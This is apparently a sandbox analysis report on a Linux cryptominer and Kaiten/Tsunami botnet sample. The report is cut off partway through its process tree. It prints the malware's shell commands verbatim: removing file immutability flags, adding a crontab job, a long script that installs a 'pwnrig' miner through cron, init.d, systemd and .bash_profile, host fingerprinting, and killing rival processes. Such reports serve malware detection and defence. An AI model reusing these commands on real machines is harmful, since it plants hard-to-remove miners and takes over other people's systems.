Analysis

  • max time kernel
    149s
  • max time network
    130s
  • platform
    ubuntu-24.04_amd64
  • resource
    ubuntu2404-amd64-20240523-en
  • resource tags

    arch:amd64arch:i386image:ubuntu2404-amd64-20240523-enkernel:6.8.0-31-genericlocale:en-usos:ubuntu-24.04-amd64system
  • submitted
    07-08-2024 09:49

General

  • Target

    653b43fe3c86956d79be1c519628ab96

  • Size

    4.3MB

  • MD5

    653b43fe3c86956d79be1c519628ab96

  • SHA1

    ea9b54203d6a96bf7a496809457006c292f9c8a9

  • SHA256

    80997198c6473f62efc3160cb8b4cb84d9bc7f7f3283f0e07ac3dc3ea2b66fbe

  • SHA512

    8fabc9321ee1e237f353510d5e614f0c14c9d44364869a6e5d9cbcb7b847352e41417b3abb49f2cb3f0b5c7e9aeb1e0dcd36ac5b79974402dd9010002a0046a3

  • SSDEEP

    98304:A/04DF7EOpAqyUj3dZ83Xx5uLZanflrivQTh5s9lN:A/0aG23v83riZanflrsQTh

Malware Config

Signatures

  • Detects Kaiten/Tsunami Payload 2 IoCs
  • Detects Kaiten/Tsunami payload 2 IoCs
  • Kaiten/Tsunami

    Linux-based IoT botnet which is controlled through IRC and normally used to carry out DDoS attacks.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • XMRig Miner payload 4 IoCs
  • Executes dropped EXE 7 IoCs
  • UPX packed file 3 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Attempts to change immutable files 57 IoCs

    Modifies inode attributes on the filesystem to allow changing of immutable files.

  • Checks hardware identifiers (DMI) 1 TTPs 16 IoCs

    Checks DMI information which indicate if the system is a virtual machine.

  • Creates/modifies Cron job 1 TTPs 28 IoCs

    Cron allows running tasks on a schedule, and is commonly used for malware persistence.

  • Enumerates running processes

    Discovers information about currently running processes on the system

  • Modifies init.d 1 TTPs 5 IoCs

    Adds/modifies system service, likely for persistence.

  • Modifies systemd 1 TTPs 5 IoCs

    Adds/ modifies systemd service files. Likely to achieve persistence.

  • Reads hardware information 1 TTPs 56 IoCs

    Accesses system info like serial numbers, manufacturer names etc.

  • Writes file to system bin folder 1 TTPs 9 IoCs
  • Checks CPU configuration 1 TTPs 16 IoCs

    Checks CPU information which indicate if the system is a virtual machine.

  • Reads CPU attributes 1 TTPs 24 IoCs
  • Enumerates kernel/hardware configuration 1 TTPs 64 IoCs

    Reads contents of /sys virtual filesystem to enumerate system information.

  • Reads runtime system information 64 IoCs

    Reads data from /proc virtual filesystem.

  • Writes file to tmp directory 12 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/653b43fe3c86956d79be1c519628ab96
    /tmp/653b43fe3c86956d79be1c519628ab96
    1⤵
    • Writes file to tmp directory
    PID:2499
  • /tmp/64f1b344-f61f-48c2-a67b-7f3fbb286f46
    "[kworker/R-debug] "
    1⤵
    • Executes dropped EXE
    • Creates/modifies Cron job
    • Modifies init.d
    • Modifies systemd
    • Writes file to system bin folder
    • Enumerates kernel/hardware configuration
    • Writes file to tmp directory
    PID:2501
    • /bin/chattr
      chattr -ia /etc/cron.d/.placeholder
      2⤵
      • Attempts to change immutable files
      PID:2525
    • /bin/chattr
      chattr -ia /etc/cron.d/anacron
      2⤵
      • Attempts to change immutable files
      PID:2526
    • /bin/chattr
      chattr -ia /etc/cron.d/e2scrub_all
      2⤵
      • Attempts to change immutable files
      PID:2528
    • /bin/chattr
      chattr -ia /var/spool/cron/atjobs
      2⤵
      • Attempts to change immutable files
      PID:2529
    • /bin/chattr
      chattr -ia /var/spool/cron/atspool
      2⤵
      • Attempts to change immutable files
      PID:2530
    • /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f
      /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d
      2⤵
      • Executes dropped EXE
      • Checks hardware identifiers (DMI)
      • Reads hardware information
      • Checks CPU configuration
      • Reads CPU attributes
      • Enumerates kernel/hardware configuration
      • Writes file to tmp directory
      PID:2531
      • /bin/sh
        sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
        3⤵
        • Attempts to change immutable files
        PID:2551
        • /bin/hostname
          hostname -I
          4⤵
          • Attempts to change immutable files
          PID:2554
        • /bin/awk
          awk "{print \$1}"
          4⤵
            PID:2556
          • /bin/cat
            cat /etc/ssh/sshd_config
            4⤵
              PID:2558
            • /bin/grep
              grep "Port "
              4⤵
                PID:2559
              • /bin/head
                head -n 1
                4⤵
                  PID:2560
                • /bin/awk
                  awk "{print \"-\"\$2}"
                  4⤵
                    PID:2561
                  • /bin/whoami
                    whoami
                    4⤵
                      PID:2562
                    • /bin/hostname
                      hostname
                      4⤵
                        PID:2563
                      • /bin/grep
                        grep -c "^processor" /proc/cpuinfo
                        4⤵
                        • Checks CPU configuration
                        PID:2564
                      • /bin/grep
                        grep -m 1 "model name" /proc/cpuinfo
                        4⤵
                        • Checks CPU configuration
                        PID:2567
                      • /bin/cut
                        cut -d: -f2
                        4⤵
                          PID:2568
                        • /bin/sed
                          sed -e "s/^ *//"
                          4⤵
                            PID:2569
                          • /bin/sed
                            sed -e "s/\$//"
                            4⤵
                            • Reads runtime system information
                            PID:2570
                          • /bin/awk
                            awk "{print \$1}"
                            4⤵
                              PID:2573
                            • /bin/awk
                              awk "{print \$4}"
                              4⤵
                                PID:2576
                              • /bin/awk
                                awk "{print \$4}"
                                4⤵
                                  PID:2579
                                • /bin/awk
                                  awk "{print \$3}"
                                  4⤵
                                    PID:2582
                                  • /bin/awk
                                    awk "{print \$4}"
                                    4⤵
                                      PID:2585
                                    • /bin/awk
                                      awk "{print \$1}"
                                      4⤵
                                        PID:2588
                                      • /bin/awk
                                        awk "{print \$2\" \"\$3\" \"\$4}"
                                        4⤵
                                          PID:2590
                                      • /bin/sh
                                        sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                        3⤵
                                          PID:2591
                                          • /bin/ps
                                            ps -A "-ostat,ppid"
                                            4⤵
                                            • Reads CPU attributes
                                            • Reads runtime system information
                                            PID:2592
                                          • /bin/awk
                                            awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                            4⤵
                                              PID:2593
                                            • /bin/id
                                              id -u
                                              4⤵
                                                PID:2595
                                              • /bin/ps
                                                ps x
                                                4⤵
                                                • Reads CPU attributes
                                                • Reads runtime system information
                                                PID:2596
                                              • /bin/grep
                                                grep /etc/cron
                                                4⤵
                                                  PID:2597
                                                • /bin/grep
                                                  grep -v grep
                                                  4⤵
                                                    PID:2598
                                                • /bin/sh
                                                  sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done else ps -u `whoami 2>/dev/null` ux | grep -v grep 2>/dev/null | grep -v -- '-bash[[:space:]]*\$' 2>/dev/null | grep -v /usr/sbin/httpd 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                  3⤵
                                                    PID:2600
                                                    • /bin/id
                                                      id -u
                                                      4⤵
                                                        PID:2601
                                                      • /bin/ps
                                                        ps aux
                                                        4⤵
                                                        • Checks CPU configuration
                                                        • Reads CPU attributes
                                                        • Reads runtime system information
                                                        PID:2602
                                                      • /bin/grep
                                                        grep -v grep
                                                        4⤵
                                                          PID:2603
                                                        • /bin/grep
                                                          grep -v -- "-bash[[:space:]]*\$"
                                                          4⤵
                                                            PID:2604
                                                          • /bin/grep
                                                            grep -v /usr/sbin/httpd
                                                            4⤵
                                                              PID:2605
                                                            • /bin/awk
                                                              awk "{if(\$3>30.0) print \$2}"
                                                              4⤵
                                                                PID:2606
                                                            • /bin/sh
                                                              sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then if [ `ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps aux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi else myid=`whoami 2>/dev/null`; if [ `ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | wc -l 2>/dev/null` -gt 1 ]; then ps -u \$myid ux 2>/dev/null | grep -v grep 2>/dev/null | grep -- '-bash[[:space:]]*\$' 2>/dev/null | awk '{if(\$3>30.0) print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi fi"
                                                              3⤵
                                                                PID:2608
                                                                • /bin/id
                                                                  id -u
                                                                  4⤵
                                                                    PID:2609
                                                                  • /bin/ps
                                                                    ps aux
                                                                    4⤵
                                                                    • Checks CPU configuration
                                                                    • Reads CPU attributes
                                                                    • Reads runtime system information
                                                                    PID:2611
                                                                  • /bin/grep
                                                                    grep -v grep
                                                                    4⤵
                                                                      PID:2612
                                                                    • /bin/grep
                                                                      grep -- "-bash[[:space:]]*\$"
                                                                      4⤵
                                                                        PID:2613
                                                                      • /bin/awk
                                                                        awk "{if(\$3>30.0) print \$2}"
                                                                        4⤵
                                                                          PID:2614
                                                                        • /bin/wc
                                                                          wc -l
                                                                          4⤵
                                                                            PID:2615
                                                                      • /bin/chattr
                                                                        chattr -ia /var/spool/cron/crontabs
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2532
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.hourly/.placeholder
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2533
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.daily/.placeholder
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2534
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.daily/0anacron
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2535
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.daily/apport
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2536
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.daily/apt-compat
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2537
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.daily/dpkg
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2538
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.daily/man-db
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2539
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.weekly/.placeholder
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2540
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.weekly/0anacron
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2541
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.weekly/man-db
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2542
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.monthly/.placeholder
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2543
                                                                      • /bin/chattr
                                                                        chattr -ia /etc/cron.monthly/0anacron
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2544
                                                                      • /bin/chattr
                                                                        chattr -ia /var/spool/cron/atjobs
                                                                        2⤵
                                                                        • Attempts to change immutable files
                                                                        PID:2545
                                                                      • /bin/bash
                                                                        bash -c "find /usr/local/share -type f -regextype egrep -regex '.*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}' -exec rm -rf {} +"
                                                                        2⤵
                                                                          PID:2546
                                                                        • /bin/find
                                                                          find /usr/local/share -type f -regextype egrep -regex ".*[0-9a-fA-F]{8}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{4}-[0-9a-fA-F]{12}" -exec rm -rf "{}" +
                                                                          2⤵
                                                                            PID:2546
                                                                          • /bin/bash
                                                                            bash -c "echo \"*/2 * * * * nohup /usr/local/share/28bce82f-4b8d-44b3-90c2-8ab3dafd7336 >/dev/null 2>&1 &\" | crontab -"
                                                                            2⤵
                                                                              PID:2548
                                                                              • /bin/crontab
                                                                                crontab -
                                                                                3⤵
                                                                                • Creates/modifies Cron job
                                                                                PID:2550
                                                                            • /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f
                                                                              /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d -pwn
                                                                              2⤵
                                                                              • Executes dropped EXE
                                                                              • Checks hardware identifiers (DMI)
                                                                              • Reads hardware information
                                                                              • Checks CPU configuration
                                                                              • Reads CPU attributes
                                                                              • Enumerates kernel/hardware configuration
                                                                              PID:2623
                                                                              • /bin/sh
                                                                                sh -c "echo \"[\$(hostname=\$(hostname -I 2>/dev/null || hostname -i 2>/dev/null);echo \$hostname | awk {'print \$1'} 2>/dev/null)\$(cat /etc/ssh/sshd_config 2>/dev/null | grep 'Port ' 2>/dev/null | head -n 1 2>/dev/null | awk {'print \"-\"\$2'} 2>/dev/null)][\$(whoami 2>/dev/null)][\$(hostname 2>/dev/null)][\$(grep -c ^processor /proc/cpuinfo 2>/dev/null)][\$(X=\$(grep -m 1 'model name' /proc/cpuinfo 2>/dev/null | cut -d: -f2 2>/dev/null | sed -e 's/^ *//' 2>/dev/null | sed -e 's/\$//' 2>/dev/null); if [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'QEMU' ]; then echo 'QEMU'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Haswell)' ]; then echo 'Haswell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = '(Broadwell)' ]; then echo 'Broadwell'; elif [ \$(echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$4'} 2>/dev/null) = 'CPU' ]; then echo \$X 2>/dev/null | awk {'print \$3'} 2>/dev/null; elif [ \$(echo \$X 2>/dev/null | awk {'print \$1'} 2>/dev/null) = 'AMD' ]; then echo \$X 2>/dev/null | awk {'print \$2\" \"\$3\" \"\$4'} 2>/dev/null; else echo \$X 2>/dev/null; fi)]\""
                                                                                3⤵
                                                                                • Attempts to change immutable files
                                                                                PID:2624
                                                                                • /bin/hostname
                                                                                  hostname -I
                                                                                  4⤵
                                                                                  • Attempts to change immutable files
                                                                                  PID:2627
                                                                                • /bin/awk
                                                                                  awk "{print \$1}"
                                                                                  4⤵
                                                                                    PID:2629
                                                                                  • /bin/grep
                                                                                    grep "Port "
                                                                                    4⤵
                                                                                      PID:2632
                                                                                    • /bin/head
                                                                                      head -n 1
                                                                                      4⤵
                                                                                        PID:2633
                                                                                      • /bin/awk
                                                                                        awk "{print \"-\"\$2}"
                                                                                        4⤵
                                                                                          PID:2634
                                                                                        • /bin/cat
                                                                                          cat /etc/ssh/sshd_config
                                                                                          4⤵
                                                                                            PID:2631
                                                                                          • /bin/whoami
                                                                                            whoami
                                                                                            4⤵
                                                                                              PID:2635
                                                                                            • /bin/hostname
                                                                                              hostname
                                                                                              4⤵
                                                                                                PID:2636
                                                                                              • /bin/grep
                                                                                                grep -c "^processor" /proc/cpuinfo
                                                                                                4⤵
                                                                                                • Checks CPU configuration
                                                                                                PID:2637
                                                                                              • /bin/grep
                                                                                                grep -m 1 "model name" /proc/cpuinfo
                                                                                                4⤵
                                                                                                • Checks CPU configuration
                                                                                                PID:2640
                                                                                              • /bin/cut
                                                                                                cut -d: -f2
                                                                                                4⤵
                                                                                                  PID:2641
                                                                                                • /bin/sed
                                                                                                  sed -e "s/^ *//"
                                                                                                  4⤵
                                                                                                    PID:2642
                                                                                                  • /bin/sed
                                                                                                    sed -e "s/\$//"
                                                                                                    4⤵
                                                                                                      PID:2643
                                                                                                    • /bin/awk
                                                                                                      awk "{print \$1}"
                                                                                                      4⤵
                                                                                                        PID:2646
                                                                                                      • /bin/awk
                                                                                                        awk "{print \$4}"
                                                                                                        4⤵
                                                                                                          PID:2649
                                                                                                        • /bin/awk
                                                                                                          awk "{print \$4}"
                                                                                                          4⤵
                                                                                                            PID:2652
                                                                                                          • /bin/awk
                                                                                                            awk "{print \$3}"
                                                                                                            4⤵
                                                                                                              PID:2655
                                                                                                            • /bin/awk
                                                                                                              awk "{print \$4}"
                                                                                                              4⤵
                                                                                                                PID:2658
                                                                                                              • /bin/awk
                                                                                                                awk "{print \$1}"
                                                                                                                4⤵
                                                                                                                  PID:2661
                                                                                                                • /bin/awk
                                                                                                                  awk "{print \$2\" \"\$3\" \"\$4}"
                                                                                                                  4⤵
                                                                                                                    PID:2663
                                                                                                                • /bin/sh
                                                                                                                  sh -c "ps -A -ostat,ppid 2>/dev/null | awk '/[zZ]/ && !a[\$2]++ {print \$2}' 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done;if [ `id -u 2>/dev/null` -eq '0' ]; then ps x 2>/dev/null | grep /etc/cron 2>/dev/null | grep -v grep 2>/dev/null | while read procid; do kill -9 \$procid 2>/dev/null; done fi"
                                                                                                                  3⤵
                                                                                                                    PID:2664
                                                                                                                    • /bin/ps
                                                                                                                      ps -A "-ostat,ppid"
                                                                                                                      4⤵
                                                                                                                      • Reads CPU attributes
                                                                                                                      • Enumerates kernel/hardware configuration
                                                                                                                      • Reads runtime system information
                                                                                                                      PID:2665
                                                                                                                    • /bin/awk
                                                                                                                      awk "/[zZ]/ && !a[\$2]++ {print \$2}"
                                                                                                                      4⤵
                                                                                                                        PID:2666
                                                                                                                      • /bin/id
                                                                                                                        id -u
                                                                                                                        4⤵
                                                                                                                          PID:2668
                                                                                                                        • /bin/ps
                                                                                                                          ps x
                                                                                                                          4⤵
                                                                                                                          • Reads CPU attributes
                                                                                                                          • Reads runtime system information
                                                                                                                          PID:2669
                                                                                                                        • /bin/grep
                                                                                                                          grep /etc/cron
                                                                                                                          4⤵
                                                                                                                            PID:2670
                                                                                                                          • /bin/grep
                                                                                                                            grep -v grep
                                                                                                                            4⤵
                                                                                                                              PID:2671
                                                                                                                          • /bin/sh
                                                                                                                            sh -c "if [ `id -u 2>/dev/null` -eq '0' ]; then SNIFFDIR='/bin';PWNDIR='/bin'; else rm -rf /tmp/.pwn 2>/dev/null;mkdir /tmp/.pwn 2>/dev/null;SNIFFDIR='/tmp/.pwn';PWNDIR='/tmp';fi;PWNRIG='pwnrig';PWNRIGE='pwnrige';PWNRIGL='pwnrigl';CROND='crondr';SYSD='sysdr';INITD='initdr';BPROFILE='bprofr';MINER='/tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f';PROGRAM='-bash';if [ `id -u 2>/dev/null` -eq '0' ]; then chattr -i -a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;fi;rm -rf \$SNIFFDIR/\$BPROFILE 2>/dev/null;sed -i \"/\$BPROFILE/d\" ~/.bash_profile 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$BPROFILE 2>/dev/null;echo \"cp -f -r -- \$SNIFFDIR/\$BPROFILE \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null\" >> ~/.bash_profile 2>/dev/null;if [ `id -u 2>/dev/null` -eq '0' ]; then chattr +i +a \$SNIFFDIR/\$BPROFILE ~/.bash_profile >/dev/null 2>&1;mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly 2>/dev/null;chattr -i -a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$CROND 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$CROND 2>/dev/null;echo -e \"#!/bin/bash\\ncp -f -r -- \$SNIFFDIR/\$CROND \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/cron.d/\$PWNRIG /etc/cron.daily/\$PWNRIG /etc/cron.hourly/\$PWNRIG /etc/cron.monthly/\$PWNRIG /etc/cron.weekly/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/cron.*/\$PWNRIG 2>/dev/null;chmod +x /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND 2>/dev/null;chattr +i +a /etc/cron.*/\$PWNRIG \$SNIFFDIR/\$CROND >/dev/null 2>&1;if which chkconfig > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;chkconfig \$PWNRIG off 2>/dev/null;chkconfig --del \$PWNRIG 2>/dev/null;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n#\\n# \$PWNRIG Start/Stop the \$PWNRIG clock daemon.\\n#\\n# chkconfig: 2345 90 60\\n# description: \$PWNRIG (by pwned)\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;chkconfig --add \$PWNRIG 2>/dev/null;chkconfig \$PWNRIG on 2>/dev/null;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which update-rc.d > /dev/null 2>&1; then chattr -i -a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;update-rc.d -f \$PWNRIG disable >/dev/null 2>&1;update-rc.d -f \$PWNRIG remove >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$INITD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$INITD 2>/dev/null;echo -e \"#!/bin/bash\\n### BEGIN INIT INFO\\n# Provides: \$PWNRIG\\n# Required-Start: \$all\\n# Required-Stop:\\n# Default-Start: 2 3 4 5\\n# Default-Stop:\\n# Short-Description: \$PWNRIG (by pwned)\\n### END INIT INFO\\ncp -f -r -- \$SNIFFDIR/\$INITD \$PWNDIR/\$PROGRAM 2>/dev/null\\ncd \$PWNDIR 2>/dev/null\\n./\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d 2>/dev/null\\nrm -rf -- \$PROGRAM 2>/dev/null\\n\" | tee /etc/init.d/\$PWNRIG > /dev/null;sed -i '1 s/-e //' /etc/init.d/\$PWNRIG 2>/dev/null;chmod +x /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD 2>/dev/null;update-rc.d \$PWNRIG defaults >/dev/null 2>&1;update-rc.d \$PWNRIG enable >/dev/null 2>&1;chattr +i +a /etc/init.d/\$PWNRIG \$SNIFFDIR/\$INITD >/dev/null 2>&1;fi;if which systemctl > /dev/null 2>&1; then chattr -i -a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;rm -rf \$SNIFFDIR/\$SYSD 2>/dev/null;cp -f -r -- \$MINER \$SNIFFDIR/\$SYSD 2>/dev/null;echo -e \"[Unit]\\nDescription=\$PWNRIG\\n\\nWants=network.target\\nAfter=syslog.target network-online.target\\n\\n[Service]\\nType=forking\\nExecStart=/bin/bash -c 'cp -f -r -- \$SNIFFDIR/\$SYSD \$PWNDIR/\$PROGRAM 2>/dev/null && \$PWNDIR/\$PROGRAM -c -p 80 -p 8080 -p 443 -tls -dp 80 -dp 8080 -dp 443 -tls -d >/dev/null 2>&1 && rm -rf -- \$PWNDIR/\$PROGRAM 2>/dev/null'\\nRestart=always\\nKillMode=process\\n\\n[Install]\\nWantedBy=multi-user.target\" | tee /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service >/dev/null;sed -i '1 s/-e //' /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service 2>/dev/null;chattr +i +a /lib/systemd/system/\$PWNRIGL.service /etc/systemd/system/\$PWNRIGE.service \$SNIFFDIR/\$SYSD >/dev/null 2>&1;systemctl enable \$PWNRIGE.service 2> /dev/null;systemctl enable \$PWNRIGL.service 2> /dev/null;systemctl daemon-reload 2> /dev/null;systemctl reload-or-restart \$PWNRIGE.service 2> /dev/null;systemctl reload-or-restart \$PWNRIGL.service 2> /dev/null;fi;fi"
                                                                                                                            3⤵
                                                                                                                            • Attempts to change immutable files
                                                                                                                            • Writes file to tmp directory
                                                                                                                            PID:2673
                                                                                                                            • /bin/id
                                                                                                                              id -u
                                                                                                                              4⤵
                                                                                                                                PID:2674
                                                                                                                              • /bin/id
                                                                                                                                id -u
                                                                                                                                4⤵
                                                                                                                                  PID:2675
                                                                                                                                • /bin/chattr
                                                                                                                                  chattr -i -a /bin/bprofr "~/.bash_profile"
                                                                                                                                  4⤵
                                                                                                                                  • Attempts to change immutable files
                                                                                                                                  PID:2676
                                                                                                                                • /bin/rm
                                                                                                                                  rm -rf /bin/bprofr
                                                                                                                                  4⤵
                                                                                                                                    PID:2677
                                                                                                                                  • /bin/sed
                                                                                                                                    sed -i /bprofr/d "~/.bash_profile"
                                                                                                                                    4⤵
                                                                                                                                    • Attempts to change immutable files
                                                                                                                                    PID:2678
                                                                                                                                  • /bin/cp
                                                                                                                                    cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/bprofr
                                                                                                                                    4⤵
                                                                                                                                    • Writes file to system bin folder
                                                                                                                                    PID:2679
                                                                                                                                  • /bin/id
                                                                                                                                    id -u
                                                                                                                                    4⤵
                                                                                                                                      PID:2680
                                                                                                                                    • /bin/chattr
                                                                                                                                      chattr +i +a /bin/bprofr "~/.bash_profile"
                                                                                                                                      4⤵
                                                                                                                                      • Attempts to change immutable files
                                                                                                                                      PID:2681
                                                                                                                                    • /bin/mkdir
                                                                                                                                      mkdir -p /etc/cron.d /etc/cron.daily /etc/cron.hourly /etc/cron.monthly /etc/cron.weekly
                                                                                                                                      4⤵
                                                                                                                                        PID:2682
                                                                                                                                      • /bin/chattr
                                                                                                                                        chattr -i -a "/etc/cron.*/pwnrig" /bin/crondr
                                                                                                                                        4⤵
                                                                                                                                        • Attempts to change immutable files
                                                                                                                                        PID:2683
                                                                                                                                      • /bin/rm
                                                                                                                                        rm -rf /bin/crondr
                                                                                                                                        4⤵
                                                                                                                                          PID:2684
                                                                                                                                        • /bin/cp
                                                                                                                                          cp -f -r -- /tmp/-bash-82c11f38-353d-49eb-b263-ceca8643985f /bin/crondr
                                                                                                                                          4⤵
